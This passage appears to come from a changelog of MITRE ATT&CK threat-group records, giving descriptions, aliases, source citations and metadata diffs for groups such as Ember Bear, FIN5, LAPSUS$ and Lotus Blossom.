"https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain" + }, + { + "source_name": "Fox-It Anunak Feb 2015", + "description": "Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.", + "url": "https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:30.378000+00:00\", \"old_value\": \"2025-04-16 20:37:39.338000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:49:28.547000+00:00", + "name": "DarkHydrus", + "description": "[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)", + "aliases": [ + "DarkHydrus" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0079", + "external_id": "G0079" + }, + { + "source_name": "DarkHydrus", + "description": "(Citation: Unit 42 DarkHydrus July 2018)" + }, + { + "source_name": "Unit 42 DarkHydrus July 2018", + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oleg Skulkin, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:28.547000+00:00\", \"old_value\": \"2025-04-16 20:37:39.039000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-15 13:07:26.651000+00:00", + "modified": "2025-04-25 14:49:05.248000+00:00", + "name": "DarkVishnya", + "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)", + "aliases": [ + "DarkVishnya" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0105", + "external_id": "G0105" + }, + { + "source_name": "DarkVishnya", + "description": "(Citation: Securelist DarkVishnya Dec 2018)" + }, + { + "source_name": "Securelist DarkVishnya Dec 2018", + "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.", + "url": "https://securelist.com/darkvishnya/89169/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:05.248000+00:00\", \"old_value\": \"2025-04-16 20:37:35.190000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--a7f57cc1-4540-4429-823f-f4e56b8473c9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-06-09 14:49:57.704000+00:00", + "modified": "2025-04-25 19:03:38.177000+00:00", + "name": "Ember Bear", + "description": "[Ember Bear](https://attack.mitre.org/groups/G1003) is a Russian state-sponsored cyber espionage group that has been active since at least 2020, linked to Russia's General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155).(Citation: CISA GRU29155 2024) [Ember Bear](https://attack.mitre.org/groups/G1003) has primarily focused operations against Ukrainian government and telecommunication entities, but has also operated against critical infrastructure entities in Europe and the Americas.(Citation: Cadet Blizzard emerges as novel threat actor) [Ember Bear](https://attack.mitre.org/groups/G1003) conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: CISA GRU29155 2024) There is some confusion as to whether [Ember Bear](https://attack.mitre.org/groups/G1003) overlaps with another Russian-linked entity referred to as [Saint Bear](https://attack.mitre.org/groups/G1031). At present available evidence strongly suggests these are distinct activities with different behavioral profiles.(Citation: Cadet Blizzard emerges as novel threat actor)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )", + "aliases": [ + "Ember Bear", + "UNC2589", + "Bleeding Bear", + "DEV-0586", + "Cadet Blizzard", + "Frozenvista", + "UAC-0056" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1003", + "external_id": "G1003" + }, + { + "source_name": "DEV-0586", + "description": "(Citation: Cadet Blizzard emerges as novel threat actor)" + }, + { + "source_name": "Cadet Blizzard", + "description": "(Citation: Cadet Blizzard emerges as novel threat actor)" + }, + { + "source_name": "Frozenvista", + "description": "(Citation: CISA GRU29155 2024)" + }, + { + "source_name": "UAC-0056", + "description": "(Citation: CISA GRU29155 2024)" + }, + { + "source_name": "Bleeding Bear", + "description": "(Citation: CrowdStrike Ember Bear Profile March 2022)" + }, + { + "source_name": "UNC2589", + "description": "(Citation: Mandiant UNC2589 March 2022)" + }, + { + "source_name": "CrowdStrike Ember Bear Profile March 2022", + "description": "CrowdStrike. (2022, March 30). Who is EMBER BEAR?. Retrieved June 9, 2022.", + "url": "https://www.crowdstrike.com/blog/who-is-ember-bear/" + }, + { + "source_name": "Cadet Blizzard emerges as novel threat actor", + "description": "Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/" + }, + { + "source_name": "Mandiant UNC2589 March 2022", + "description": "Sadowski, J; Hall, R. (2022, March 4). Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation. Retrieved June 9, 2022.", + "url": "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation" + }, + { + "source_name": "Palo Alto Unit 42 OutSteel SaintBot February 2022 ", + "description": "Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.", + "url": "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/" + }, + { + "source_name": "CISA GRU29155 2024", + "description": "US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. Retrieved September 6, 2024.", + "url": "https://www.cisa.gov/sites/default/files/2024-09/aa24-249a-russian-military-cyber-actors-target-us-and-global-critical-infrastructure.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:03:38.177000+00:00\", \"old_value\": \"2024-12-03 20:19:38.721000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "2.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:54.697000+00:00", + "modified": "2025-04-25 14:48:45.400000+00:00", + "name": "Equation", + "description": "[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)", + "aliases": [ + "Equation" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0020", + "external_id": "G0020" + }, + { + "source_name": "Equation", + "description": "(Citation: Kaspersky Equation QA)" + }, + { + "source_name": "Kaspersky Equation QA", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:45.400000+00:00\", \"old_value\": \"2025-04-16 20:37:33.110000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-22 16:46:17.790000+00:00", + "modified": "2025-04-25 14:49:26.766000+00:00", + "name": "Evilnum", + "description": "[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)", + "aliases": [ + "Evilnum" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0120", + "external_id": "G0120" + }, + { + "source_name": "Evilnum", + "description": "(Citation: ESET EvilNum July 2020)" + }, + { + "source_name": "ESET EvilNum July 2020", + "description": "Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.", + "url": "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:26.766000+00:00\", \"old_value\": \"2025-04-16 20:37:38.720000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:49:23.588000+00:00", + "name": "FIN5", + "description": "[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)", + "aliases": [ + "FIN5" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0053", + "external_id": "G0053" + }, + { + "source_name": "FIN5", + "description": "(Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "FireEye Respond Webinar July 2017", + "description": "Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.", + "url": "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + }, + { + "source_name": "DarkReading FireEye FIN5 Oct 2015", + "description": "Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.", + "url": "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Walker Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:23.588000+00:00\", \"old_value\": \"2025-04-16 20:37:38.089000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-28 17:41:12.950000+00:00", + "modified": "2025-04-25 14:49:38.455000+00:00", + "name": "Ferocious Kitten", + "description": "[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)", + "aliases": [ + "Ferocious Kitten" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0137", + "external_id": "G0137" + }, + { + "source_name": "Kaspersky Ferocious Kitten Jun 2021", + "description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.", + "url": "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:38.455000+00:00\", \"old_value\": \"2025-04-16 20:37:40.731000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:05.611000+00:00", + "modified": "2025-04-25 14:49:37.572000+00:00", + "name": "GCMAN", + "description": "[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)", + "aliases": [ + "GCMAN" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0036", + "external_id": "G0036" + }, + { + "source_name": "GCMAN", + "description": "(Citation: Securelist GCMAN)" + }, + { + "source_name": "Securelist GCMAN", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.", + "url": "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:37.572000+00:00\", \"old_value\": \"2025-04-16 20:37:40.552000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 14:26:42.897000+00:00", + "modified": "2025-04-25 14:49:34.304000+00:00", + "name": "Gallmaker", + "description": "[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)", + "aliases": [ + "Gallmaker" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0084", + "external_id": "G0084" + }, + { + "source_name": "Gallmaker", + "description": "(Citation: Symantec Gallmaker Oct 2018)" + }, + { + "source_name": "Symantec Gallmaker Oct 2018", + "description": "Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:34.304000+00:00\", \"old_value\": \"2025-04-16 20:37:40.106000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:49:11.522000+00:00", + "name": "Gorgon Group", + "description": "[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)", + "aliases": [ + "Gorgon Group" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0078", + "external_id": "G0078" + }, + { + "source_name": "Gorgon Group", + "description": "(Citation: Unit 42 Gorgon Group Aug 2018)" + }, + { + "source_name": "Unit 42 Gorgon Group Aug 2018", + "description": "Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.5", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:11.522000+00:00\", \"old_value\": \"2025-04-16 20:37:36.314000+00:00\"}}}", + "previous_version": "1.5" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--e5603ea8-4c36-40e7-b7af-a077d24fedc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-24 21:41:34.797000+00:00", + "modified": "2025-04-25 14:49:40.589000+00:00", + "name": "IndigoZebra", + "description": "[IndigoZebra](https://attack.mitre.org/groups/G0136) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)", + "aliases": [ + "IndigoZebra" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0136", + "external_id": "G0136" + }, + { + "source_name": "IndigoZebra", + "description": "(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)" + }, + { + "source_name": "HackerNews IndigoZebra July 2021", + "description": "Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.", + "url": "https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html" + }, + { + "source_name": "Checkpoint IndigoZebra July 2021", + "description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.", + "url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + }, + { + "source_name": "Securelist APT Trends Q2 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.", + "url": "https://securelist.com/apt-trends-report-q2-2017/79332/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Yoshihiro Kori, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:40.589000+00:00\", \"old_value\": \"2025-04-16 20:37:41.185000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d8bc9788-4f7d-41a9-9e9d-ee1ea18a8cf7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-06-09 19:14:31.327000+00:00", + "modified": "2025-04-21 19:40:47.538000+00:00", + "name": "LAPSUS$", + "description": "[LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)", + "aliases": [ + "LAPSUS$", + "DEV-0537", + "Strawberry Tempest" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1004", + "external_id": "G1004" + }, + { + "source_name": "Strawberry Tempest", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "DEV-0537", + "description": "(Citation: MSTIC DEV-0537 Mar 2022)" + }, + { + "source_name": "BBC LAPSUS Apr 2022", + "description": "BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.", + "url": "https://www.bbc.com/news/technology-60953527" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "MSTIC DEV-0537 Mar 2022", + "description": "MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + }, + { + "source_name": "UNIT 42 LAPSUS Mar 2022", + "description": "UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. Retrieved May 17, 2022.", + "url": "https://unit42.paloaltonetworks.com/lapsus-group/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "David Hughes, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada", + "Caio Silva" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.538000+00:00\", \"old_value\": \"2025-04-07 14:44:59.715000+00:00\"}, \"root['x_mitre_contributors'][2]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "2.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:01.092000+00:00", + "modified": "2025-04-23 21:20:58.367000+00:00", + "name": "Lotus Blossom", + "description": "[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, [Lotus Blossom](https://attack.mitre.org/groups/G0030) has also targeted entities such as digital certificate issuers.(Citation: Lotus Blossom Jun 2015)(Citation: Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025)", + "aliases": [ + "Lotus Blossom", + "DRAGONFISH", + "Spring Dragon", + "RADIUM", + "Raspberry Typhoon", + "Bilbug", + "Thrip" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0030", + "external_id": "G0030" + }, + { + "source_name": "DRAGONFISH", + "description": "(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "Thrip", + "description": "(Citation: Cisco LotusBlossom 2025)" + }, + { + "source_name": "Lotus Blossom", + "description": "(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "RADIUM", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Raspberry Typhoon", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Spring Dragon", + "description": "(Citation: Spring Dragon Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "Bilbug", + "description": "(Citation: Symantec Bilbug 2022)" + }, + { + "source_name": "Accenture Dragonfish Jan 2018", + "description": "Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN 